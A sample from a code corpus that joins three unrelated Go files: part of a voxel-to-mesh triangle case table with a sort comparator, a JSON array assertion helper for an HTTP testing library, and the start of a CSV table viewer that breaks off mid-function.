		return apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), twoAdjacentCorners)
	case g0 | g1 | g2 | g3 | g6 | g7: // vertical mirror of g0 | g1
		return apply(k, mirrorZ(v2v), twoAdjacentCorners)
	case g0 | g1 | g2 | g3 | g5 | g6:
		return apply(k, rotateTrisCounterClockwiseZ(mirrorZ(v2v)), twoAdjacentCorners)
	case g0 | g1 | g4 | g5 | g6 | g7:
		return apply(k, mirrorY(v2v), twoAdjacentCorners)
	case g0 | g3 | g4 | g5 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseZ(mirrorX(v2v)), twoAdjacentCorners)
	case g1 | g2 | g4 | g5 | g6 | g7:
		return apply(k, rotateTrisClockwiseZ(mirrorX(v2v)), twoAdjacentCorners)
	case g2 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g4 | g5
		return apply(k, rotateTrisCounterClockwiseX(mirrorZ(v2v)), twoAdjacentCorners)
	case g1 | g2 | g3 | g5 | g6 | g7: // mirrorX of g1 | g5, mirrorY of g3 | g7
		return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(mirrorX(v2v))), twoAdjacentCorners)
	case g0 | g1 | g2 | g4 | g5 | g6: // mirrorX of g2 | g6, mirrorY of g0 | g4
		return apply(k, rotateTrisClockwiseY(mirrorY(v2v)), twoAdjacentCorners)
	case g0 | g2 | g3 | g4 | g6 | g7: // mirrorX of g0 | g4
		return apply(k, rotateTrisClockwiseY(mirrorX(v2v)), twoAdjacentCorners)
	case g0 | g1 | g3 | g4 | g5 | g7: // mirrorX of g3 | g7, mirrorY of g1 | g5
		return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(mirrorX(v2v))), twoAdjacentCorners)
	case g0 | g1 | g2 | g3 | g4 | g5: // mirrorY of g4 | g5, mirrorZ of g2 | g3
		return apply(k, rotateTris180Z(mirrorZ(v2v)), twoAdjacentCorners)
	case g0 | g1 | g2 | g3 | g4 | g7: // mirrorZ of g1 | g2
		return apply(k, rotateTrisClockwiseZ(mirrorZ(v2v)), twoAdjacentCorners)
	// two opposite level corners
	case g0 | g2: // bottom
		return apply(k, v2v, twoOppositeLevelCorners)
	case g1 | g3: // bottom
		return apply(k, rotateTrisClockwiseZ(v2v), twoOppositeLevelCorners)
	case g0 | g7: // left
		return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseX(v2v)), twoOppositeLevelCorners)
	case g3 | g4: // left
		return apply(k, rotateTrisClockwiseY(v2v), twoOppositeLevelCorners)
	case g0 | g5: // back
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(v2v)), twoOppositeLevelCorners)
	case g1 | g4: // back
		return apply(k, rotateTrisCounterClockwiseX(v2v), twoOppositeLevelCorners)
	case g1 | g6: // right
		return apply(k, rotateTrisCounterClockwiseY(v2v), twoOppositeLevelCorners)
	case g2 | g5: // right
		return apply(k, rotateTrisCounterClockwiseY(rotateTrisClockwiseX(v2v)), twoOppositeLevelCorners)
	case g3 | g6: // front
		return apply(k, rotateTrisClockwiseX(v2v), twoOppositeLevelCorners)
	case g2 | g7: // front
		return apply(k, rotateTrisClockwiseX(rotateTrisClockwiseY(v2v)), twoOppositeLevelCorners)
	case g4 | g6: // top
		return apply(k, rotateTris180X(rotateTrisClockwiseZ(v2v)), twoOppositeLevelCorners)
	case g5 | g7: // top
		return apply(k, rotateTris180X(v2v), twoOppositeLevelCorners)
	// two opposite diagonal corners
	case g0 | g6:
		return apply(k, v2v, twoOppositeDiagonalCorners)
	case g1 | g7:
		return apply(k, rotateTrisClockwiseZ(v2v), twoOppositeDiagonalCorners)
	case g2 | g4:
		return apply(k, rotateTris180Z(v2v), twoOppositeDiagonalCorners)
	case g3 | g5:
		return apply(k, rotateTrisCounterClockwiseZ(v2v), twoOppositeDiagonalCorners)
	// three adjacent corners
	case g0 | g1 | g2:
		return apply(k, v2v, threeAdjacentCorners)
	case g0 | g1 | g3:
		return apply(k, rotateTrisCounterClockwiseZ(v2v), threeAdjacentCorners)
	case g0 | g2 | g3:
		return apply(k, rotateTris180Z(v2v), threeAdjacentCorners)
	case g1 | g2 | g3:
		return apply(k, rotateTrisClockwiseZ(v2v), threeAdjacentCorners)
	case g4 | g5 | g6:
		return apply(k, rotateTris180X(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
	case g4 | g5 | g7:
		return apply(k, rotateTris180X(rotateTris180Z(v2v)), threeAdjacentCorners)
	case g4 | g6 | g7:
		return apply(k, rotateTris180X(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
	case g5 | g6 | g7:
		return apply(k, rotateTris180X(v2v), threeAdjacentCorners)
	case g0 | g4 | g5:
		return apply(k, rotateTrisCounterClockwiseY(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
	case g1 | g2 | g6:
		return apply(k, rotateTrisClockwiseY(rotateTris180Z(v2v)), threeAdjacentCorners)
	case g2 | g3 | g6:
		return apply(k, rotateTrisClockwiseX(v2v), threeAdjacentCorners)
	case g0 | g4 | g7:
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
	case g2 | g3 | g7:
		return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
	case g0 | g3 | g7:
		return apply(k, rotateTrisClockwiseX(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
	case g0 | g1 | g5:
		return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
	case g1 | g5 | g6:
		return apply(k, rotateTrisCounterClockwiseY(v2v), threeAdjacentCorners)
	case g3 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), threeAdjacentCorners)
	case g2 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseY(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
	case g1 | g4 | g5:
		return apply(k, rotateTrisCounterClockwiseX(v2v), threeAdjacentCorners)
	case g0 | g1 | g4:
		return apply(k, rotateTrisClockwiseX(rotateTris180Z(v2v)), threeAdjacentCorners)
	case g3 | g4 | g7:
		return apply(k, rotateTrisCounterClockwiseY(rotateTris180Z(v2v)), threeAdjacentCorners)
	case g2 | g5 | g6:
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
	case g0 | g3 | g4:
		return apply(k, rotateTrisClockwiseY(v2v), threeAdjacentCorners)
	case g1 | g2 | g5:
		return apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
	case g0 | g1 | g2 | g3 | g6:
		return apply(k, rotateTris180X(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g2 | g3 | g7:
		return apply(k, rotateTris180X(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g1 | g4 | g5 | g6 | g7:
		return apply(k, rotateTris180Z(v2v), flipNormals(threeAdjacentCorners))
	case g0 | g4 | g5 | g6 | g7:
		return apply(k, rotateTrisClockwiseZ(v2v), flipNormals(threeAdjacentCorners))
	case g0 | g3 | g4 | g5 | g7:
		return apply(k, rotateTrisClockwiseY(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
	case g2 | g3 | g5 | g6 | g7:
		return apply(k, rotateTrisClockwiseX(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
	case g2 | g3 | g4 | g6 | g7:
		return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g0 | g3 | g4 | g6 | g7:
		return apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g1 | g2 | g5 | g6 | g7:
		return apply(k, rotateTrisClockwiseY(v2v), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g4 | g5 | g7:
		return apply(k, rotateTrisClockwiseX(v2v), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g4 | g5 | g6:
		return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g1 | g2 | g4 | g5 | g6:
		return apply(k, rotateTrisClockwiseX(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g2 | g4 | g5 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseZ(v2v), flipNormals(threeAdjacentCorners))
	case g0 | g2 | g3 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseX(v2v), flipNormals(threeAdjacentCorners))
	case g0 | g2 | g3 | g4 | g7:
		return apply(k, rotateTrisCounterClockwiseY(v2v), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g2 | g5 | g6:
		return apply(k, rotateTrisCounterClockwiseY(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
	case g1 | g2 | g3 | g5 | g6:
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g2 | g4 | g5: // (inverse = g367 = case g3 | g6 | g7:)
		return apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
	case g3 | g4 | g5 | g6 | g7: // (inverse = g012 = case g0 | g1 | g2:)
		return apply(k, v2v, flipNormals(threeAdjacentCorners))
	case g0 | g1 | g2 | g3 | g5: // (inverse = g467 = case g4 | g6 | g7:)
		return apply(k, rotateTris180X(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g3 | g4 | g7: // (inverse = g256 = case g2 | g5 | g6:)
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g2 | g3 | g4: // (inverse = g567 = case g5 | g6 | g7:)
		return apply(k, rotateTris180X(v2v), flipNormals(threeAdjacentCorners))
	case g1 | g2 | g3 | g6 | g7: // (inverse = g045 = case g0 | g4 | g5:)
		return apply(k, rotateTrisCounterClockwiseY(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	case g0 | g1 | g3 | g4 | g5: // (inverse = g267 = case g2 | g6 | g7:)
		return apply(k, rotateTrisCounterClockwiseY(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
	// half corners
	case g0 | g1 | g2 | g5:
		tris = append(tris, apply(k, v2v, halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(v2v)), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(v2v)), halfCorner)...)
		return tris
	case g0 | g1 | g3 | g4:
		tris = append(tris, apply(k, rotateTrisCounterClockwiseZ(v2v), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTris180Z(v2v)), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v))), halfCorner)...) // could be simplified to two rotations
		return tris
	case g0 | g2 | g3 | g7:
		tris = append(tris, apply(k, rotateTris180Z(v2v), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisClockwiseZ(v2v)), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTris180Z(v2v))), halfCorner)...) // could be simplified to two rotations
		return tris
	case g0 | g4 | g5 | g7: // ok, now I'm just being lazy. It works.
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)))), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)))), halfCorner)...)
		return tris
	case g1 | g2 | g3 | g6:
		tris = append(tris, apply(k, rotateTrisClockwiseZ(v2v), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(v2v), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v))), halfCorner)...) // could be simplified to two rotations, but let's allow the computer some fun.
		return tris
	case g1 | g4 | g5 | g6:
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(v2v), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(v2v))), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(v2v))), halfCorner)...)
		return tris
	case g2 | g5 | g6 | g7:
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)))), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)))), halfCorner)...)
		return tris
	case g3 | g4 | g6 | g7:
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(rotateTris180Z(v2v)))), halfCorner)...)
		tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(rotateTris180Z(v2v)))), halfCorner)...)
		return tris
	// unusual cases
	case g0 | g3 | g5 | g6 | g7:
		return apply(k, v2v, g0357)
	case g0 | g1 | g2 | g6 | g7: // (inverse = g345 = case g3 | g4 | g5:)
		return apply(k, mirrorZ(rotateTrisCounterClockwiseZ(v2v)), flipNormals(g0357))
	case g3 | g4 | g5: // (inverse = g01267 = case g0 | g1 | g2 | g6 | g7:)
		return apply(k, mirrorZ(rotateTrisCounterClockwiseZ(v2v)), g0357)
	case g2 | g3 | g4:
		return apply(k, v2v, g234)
	case g0 | g1 | g5 | g6 | g7: // (inverse = g234 = case g2 | g3 | g4:)
		return apply(k, v2v, flipNormals(g234))
	case g0 | g6 | g7: // (inverse = g12345 = case g1 | g2 | g3 | g4 | g5:)
		return apply(k, mirrorZ(v2v), flipNormals(g234))
	case g1 | g2 | g3 | g4 | g5: // (inverse = g067 = case g0 | g6 | g7:)
		return apply(k, mirrorZ(v2v), g234)
	case g1 | g6 | g7: // (inverse = g02345 = case g0 | g2 | g3 | g4 | g5:)
		return apply(k, mirrorX(v2v), flipNormals(g234))
	case g0 | g2 | g3 | g4 | g5: // (inverse = g167 = case g1 | g6 | g7:)
		return apply(k, mirrorX(v2v), g234)
	case g0 | g1 | g6: // (inverse = g23457 = case g2 | g3 | g4 | g5 | g7:)
		return apply(k, rotateTris180Z(v2v), g234)
	case g2 | g3 | g4 | g5 | g7: // (inverse = g016 = case g0 | g1 | g6:)
		return apply(k, rotateTris180Z(v2v), flipNormals(g234))
	case g0 | g1 | g7: // (inverse = g23456 = case g2 | g3 | g4 | g5 | g6:)
		return apply(k, rotateTris180Z(mirrorX(v2v)), flipNormals(g234))
	case g2 | g3 | g4 | g5 | g6: // (inverse = g017 = case g0 | g1 | g7:)
		return apply(k, rotateTris180Z(mirrorX(v2v)), g234)
	case g2 | g4 | g5: // (inverse = g01367 = case g0 | g1 | g3 | g6 | g7:)
		return apply(k, mirrorZ(rotateTris180Z(v2v)), flipNormals(g234))
	case g0 | g1 | g3 | g6 | g7: // (inverse = g245 = case g2 | g4 | g5:)
		return apply(k, mirrorZ(rotateTris180Z(v2v)), g234)
	case g2 | g3 | g5: // (inverse = g01467 = case g0 | g1 | g4 | g6 | g7:)
		return apply(k, rotateTris180Z(mirrorX(rotateTris180Z(v2v))), flipNormals(g234))
	case g0 | g1 | g4 | g6 | g7: // (inverse = g235 = case g2 | g3 | g5:)
		return apply(k, rotateTris180Z(mirrorX(rotateTris180Z(v2v))), g234)
	case g0 | g1 | g6 | g7:
		return apply(k, v2v, g0167)
	case g2 | g3 | g4 | g5: // (inverse = g0167 = case g0 | g1 | g6 | g7:)
		return apply(k, v2v, flipNormals(g0167))
	case g0 | g1 | g5 | g6:
		return apply(k, v2v, g0156)
	case g0 | g3 | g6 | g7:
		return apply(k, mirrorX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(g0156))
	case g2 | g3 | g4 | g7:
		return apply(k, rotateTris180Z(v2v), g0156)
	case g0 | g4 | g5 | g6:
		return apply(k, rotateTrisCounterClockwiseY(mirrorX(v2v)), flipNormals(g0156))
	case g3 | g4 | g5 | g7:
		return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(v2v))), flipNormals(g0156))
	case g0 | g1 | g2 | g6: // (inverse = g3457 = case g3 | g4 | g5 | g7:)
		return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(v2v))), g0156)
	case g2 | g3 | g5 | g6:
		return apply(k, mirrorX(rotateTris180Z(v2v)), flipNormals(g0156))
	case g0 | g3 | g4 | g5: // (inverse = g1267 = case g1 | g2 | g6 | g7:)
		return apply(k, rotateTrisCounterClockwiseZ(v2v), g0156)
	case g1 | g2 | g6 | g7: // (inverse = g0345 = case g0 | g3 | g4 | g5:)
		return apply(k, rotateTrisCounterClockwiseZ(v2v), flipNormals(g0156))
	case g0 | g1 | g4 | g7: // (inverse = g2356 = case g2 | g3 | g5 | g6:)
		return apply(k, mirrorX(rotateTris180Z(v2v)), g0156)
	case g1 | g2 | g4 | g5: // (inverse = g0367 = case g0 | g3 | g6 | g7:)
		return apply(k, mirrorX(rotateTrisCounterClockwiseZ(v2v)), g0156)
	case g1 | g4 | g5 | g7: // (inverse = g0236 = case g0 | g2 | g3 | g6:)
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), g0156)
	case g0 | g2 | g3 | g6:
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(g0156))
	case g0 | g4 | g6 | g7: // (inverse = g1235 = case g1 | g2 | g3 | g5:)
		return apply(k, rotateTris180Z(rotateTrisClockwiseX(v2v)), g0156)
	case g1 | g2 | g3 | g5:
		return apply(k, rotateTris180Z(rotateTrisClockwiseX(v2v)), flipNormals(g0156))
	case g2 | g4 | g5 | g6: // (inverse = g0137 = case g0 | g1 | g3 | g7:)
		return apply(k, rotateTrisClockwiseZ(rotateTrisClockwiseX(v2v)), g0156)
	case g0 | g1 | g3 | g7: // (inverse = g2456 = case g2 | g4 | g5 | g6:)
		return apply(k, rotateTrisClockwiseZ(rotateTrisClockwiseX(v2v)), flipNormals(g0156))
	case g0 | g2 | g3 | g4: // (inverse = g1567 = case g1 | g5 | g6 | g7:)
		return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(rotateTris180Z(v2v)))), g0156) // could be simplified.
	case g1 | g5 | g6 | g7: // (inverse = g0234 = case g0 | g2 | g3 | g4:)
		return apply(k, rotateTrisCounterClockwiseY(mirrorX(rotateTrisCounterClockwiseZ(rotateTris180Z(v2v)))), flipNormals(g0156))
	case g2 | g4 | g5 | g7:
		return apply(k, v2v, g2457)
	case g1 | g2 | g4 | g6 | g7:
		return apply(k, v2v, g12467)
	case g0 | g2 | g4 | g5 | g6 | g7:
		return apply(k, v2v, g024567)
	case g1 | g3 | g4 | g5 | g6 | g7:
		return apply(k, rotateTrisClockwiseZ(v2v), g024567)
	case g1 | g2 | g3 | g4 | g5 | g6:
		return apply(k, rotateTrisClockwiseY(v2v), g024567)
	case g1 | g2 | g3 | g4 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseX(v2v), g024567)
	case g0 | g2 | g3 | g4 | g5 | g7:
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), g024567)
	case g0 | g2 | g3 | g5 | g6 | g7:
		return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), g024567)
	case g0 | g1 | g3 | g4 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseY(v2v), g024567)
	case g0 | g1 | g2 | g5 | g6 | g7:
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), g024567)
	case g1 | g3 | g4 | g5 | g6:
		return apply(k, v2v, g13456)
	case g0 | g2 | g4 | g5 | g7:
		return apply(k, rotateTrisCounterClockwiseZ(v2v), g13456)
	default:
		log.Printf("grid2tris: k=%v: unhandled:\n%v", k, n)
	}
	return nil
}
// TriangleLess provides a Less function for sort.Slice.
// Triangles are ordered lexicographically by their vertex coordinates:
// V1 first, then V2, then V3, comparing each vertex by Z, then Y, then X.
// NOTE(review): NaN coordinates would compare neither less nor greater and
// fall through to later fields — confirm inputs are always finite.
func TriangleLess(t []*gl.Triangle) func(a, b int) bool {
	return func(a, b int) bool {
		// Compare V1 by Z, then Y, then X.
		if t[a].V1.Position.Z < t[b].V1.Position.Z {
			return true
		}
		if t[a].V1.Position.Z > t[b].V1.Position.Z {
			return false
		}
		if t[a].V1.Position.Y < t[b].V1.Position.Y {
			return true
		}
		if t[a].V1.Position.Y > t[b].V1.Position.Y {
			return false
		}
		if t[a].V1.Position.X < t[b].V1.Position.X {
			return true
		}
		if t[a].V1.Position.X > t[b].V1.Position.X {
			return false
		}
		// V1 positions are equal; compare V2.
		if t[a].V2.Position.Z < t[b].V2.Position.Z {
			return true
		}
		if t[a].V2.Position.Z > t[b].V2.Position.Z {
			return false
		}
		if t[a].V2.Position.Y < t[b].V2.Position.Y {
			return true
		}
		if t[a].V2.Position.Y > t[b].V2.Position.Y {
			return false
		}
		if t[a].V2.Position.X < t[b].V2.Position.X {
			return true
		}
		if t[a].V2.Position.X > t[b].V2.Position.X {
			return false
		}
		// V1 and V2 positions are equal; V3 is the tie-breaker.
		if t[a].V3.Position.Z < t[b].V3.Position.Z {
			return true
		}
		if t[a].V3.Position.Z > t[b].V3.Position.Z {
			return false
		}
		if t[a].V3.Position.Y < t[b].V3.Position.Y {
			return true
		}
		if t[a].V3.Position.Y > t[b].V3.Position.Y {
			return false
		}
		return t[a].V3.Position.X < t[b].V3.Position.X
	}
}
func (n neighborBitMap) String() string {
test := "g"
invTest := "g"
var result []string
var invResult []string
if n&g0 != 0 {
result = append(result, "g0")
test += "0"
} else {
invResult = append(invResult, "g0")
invTest += "0"
}
if n&g1 != 0 {
result = append(result, "g1")
test += "1"
} else {
invResult = append(invResult, "g1")
invTest += "1"
}
if n&g2 != 0 {
result = append(result, "g2")
test += "2"
} else {
invResult = append(invResult, "g2")
invTest += "2"
}
if n&g3 != 0 {
result = append(result, "g3")
test += "3"
} else {
invResult = append(invResult, "g3")
invTest += "3"
}
if n&g4 != 0 {
result = append(result, "g4")
test += "4"
} else {
invResult = append(invResult, "g4")
invTest += "4"
}
if n&g5 != 0 {
result = append(result, "g5")
test += "5"
} else {
invResult = append(invResult, "g5")
invTest += "5"
}
if n&g6 != 0 {
result = append(result, "g6")
test += "6"
} else {
invResult = append(invResult, "g6")
invTest += "6"
}
if n&g7 != 0 {
result = append(result, "g7")
test += "7"
} else {
invResult = append(invResult, "g7")
invTest += "7"
}
if len(result) == 0 {
return fmt.Sprintf("%v=%#x=*empty*", int(n), int(n))
}
return fmt.Sprintf("%v = case %v: (inverse = %v = case %v:)", test, strings.Join(result, " | "), invTest, strings.Join(invResult, " | "))
} | binvox/manifold.go | 0.662906 | 0.533944 | manifold.go | starcoder |
package httpexpect
import (
"fmt"
)
// JSONArrayType is the raw representation of a decoded JSON array.
type JSONArrayType = []interface{}

// JSONArray wraps a decoded JSON array together with the expectation it
// belongs to and the JSON path used in failure messages.
type JSONArray struct {
	// expectation receives fatalf calls when an assertion on this array fails.
	expectation *Expectation
	// path is the JSON-path prefix used when building child element paths.
	path string
	// value holds the decoded array elements.
	value []interface{}
}
// Len exposes the array's length as a JSONNumber rooted at "<path>.$len".
func (a *JSONArray) Len() *JSONNumber {
	length := float64(len(a.value))
	return &JSONNumber{
		expectation: a.expectation,
		path:        a.path + ".$len",
		value:       length,
	}
}
func (a *JSONArray) Number(idx int) *JSONNumber {
if idx < len(a.value) {
if number, ok := a.value[idx].(float64); ok {
return &JSONNumber{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: number,
}
}
a.expectation.fatalf(`element at %d is not a number`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) String(idx int) *JSONString {
if idx < len(a.value) {
if str, ok := a.value[idx].(string); ok {
return &JSONString{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: str,
}
}
a.expectation.fatalf(`element at %d is not a string`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Bool(idx int) *JSONBool {
if idx < len(a.value) {
if b, ok := a.value[idx].(bool); ok {
return &JSONBool{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: b,
}
}
a.expectation.fatalf(`element at %d is not a bool`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Array(idx int) *JSONArray {
if idx < len(a.value) {
if array, ok := a.value[idx].(JSONArrayType); ok {
return &JSONArray{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: array,
}
}
a.expectation.fatalf(`element at %d is not an array`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Object(idx int) *JSONObject {
if idx < len(a.value) {
if obj, ok := a.value[idx].(JSONObjectType); ok {
return &JSONObject{
expectation: a.expectation,
path: fmt.Sprintf("%s.$%d", a.path, idx),
value: obj,
}
}
a.expectation.fatalf(`element at %d is not an object`, idx)
return nil
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
return nil
}
func (a *JSONArray) Null(idx int) {
if idx < len(a.value) {
if a.value[idx] != nil {
a.expectation.fatalf(`element at %d is not a null`, idx)
return
}
return
}
a.expectation.fatalf(`index %d is out of bounds (len=%d)`, idx, len(a.value))
} | httpexpect/json_array.go | 0.620507 | 0.542742 | json_array.go | starcoder |
package civ
import (
"fmt"
"strconv"
)
// Table holds a parsed CSV-like table (header plus rows) together with the
// view state used to render it.
type Table struct {
	header Row
	// Maximum length of each column's data, including both header
	// and contents.
	maxLen []int
	// Column indices that are currently hidden from display.
	disabledCols []int
	// Table contents excluding the header.
	contents []Row
	// View offsets (first visible column/row), starting from 0.
	offsetCol int
	offsetRow int
	// outputStdout presumably selects plain-stdout output; it is not
	// read in this chunk — TODO confirm where it is used.
	outputStdout bool
}

// Row is a single table row: its cells plus per-row search/visibility state.
type Row struct {
	cols []Cell
	// hasMatched presumably records whether any cell matched a search;
	// it is not written in this chunk — TODO confirm.
	hasMatched bool
	// isVisible controls whether the row is rendered (used for filtering).
	isVisible bool
}

// Cell is one table cell plus the matched substring range used for
// search highlighting ([matchBegin, matchEnd), -1 when no match).
type Cell struct {
	data string
	matchBegin int
	matchEnd int
	width int // formatted size, available on only header
}
// NewTable builds a Table from raw string rows. The first row of indata is
// used as the header unless dummyHeader is true, in which case synthetic
// "col_N" headers are generated and all of indata is treated as content.
// maxLen is initialized per column to the longest cell seen.
//
// NOTE(review): panics if indata is empty (indata[0]) or if a later row has
// more columns than the first (t.maxLen[i]) — confirm callers guarantee a
// rectangular, non-empty input.
// NOTE(review): with dummyHeader, maxLen is seeded from the first data row,
// so the length of the generated "col_N" label itself is not reflected in
// maxLen — confirm the renderer accounts for this.
func NewTable(indata [][]string, dummyHeader bool) *Table {
	t := &Table{
		offsetCol: 0,
		offsetRow: 0,
	}
	nCols := len(indata[0])
	// Load header data
	t.maxLen = make([]int, nCols)
	for i, cell := range indata[0] {
		c := Cell{
			matchBegin: -1,
			matchEnd: -1,
		}
		if dummyHeader {
			// make dummy header
			c.data = "col_" + strconv.Itoa(i)
			t.header.cols = append(t.header.cols, c)
		} else {
			c.data = cell
			t.header.cols = append(t.header.cols, c)
		}
		// Initialize the maximum length of each column from the
		// first row's data.
		t.maxLen[i] = len(cell)
	}
	// Load table data
	csvdata := indata[1:]
	if dummyHeader {
		// If using dummy header, csv data starts from indata[0]
		csvdata = indata
	}
	for _, row := range csvdata {
		var r Row
		r.isVisible = true
		for i, cell := range row {
			c := &Cell{
				data: cell,
				matchBegin: -1,
				matchEnd: -1,
			}
			r.cols = append(r.cols, *c)
			if t.maxLen[i] < len(cell) {
				t.maxLen[i] = len(cell)
			}
		}
		t.contents = append(t.contents, r)
	}
	return t
}
// FindColName looks up a header column by name and returns its index and
// true when found, or (-1, false) otherwise.
func (t *Table) FindColName(name string) (int, bool) {
	for idx := range t.header.cols {
		if t.header.cols[idx].data == name {
			return idx, true
		}
	}
	return -1, false
}
// NEnabledCols reports how many columns are currently visible.
func (t *Table) NEnabledCols() int {
	total := len(t.header.cols)
	hidden := len(t.disabledCols)
	return total - hidden
}
// IsColEnabled reports whether column colNum is visible, i.e. not present
// in the disabled-column list.
func (t *Table) IsColEnabled(colNum int) bool {
	for _, disabled := range t.disabledCols {
		if disabled == colNum {
			return false
		}
	}
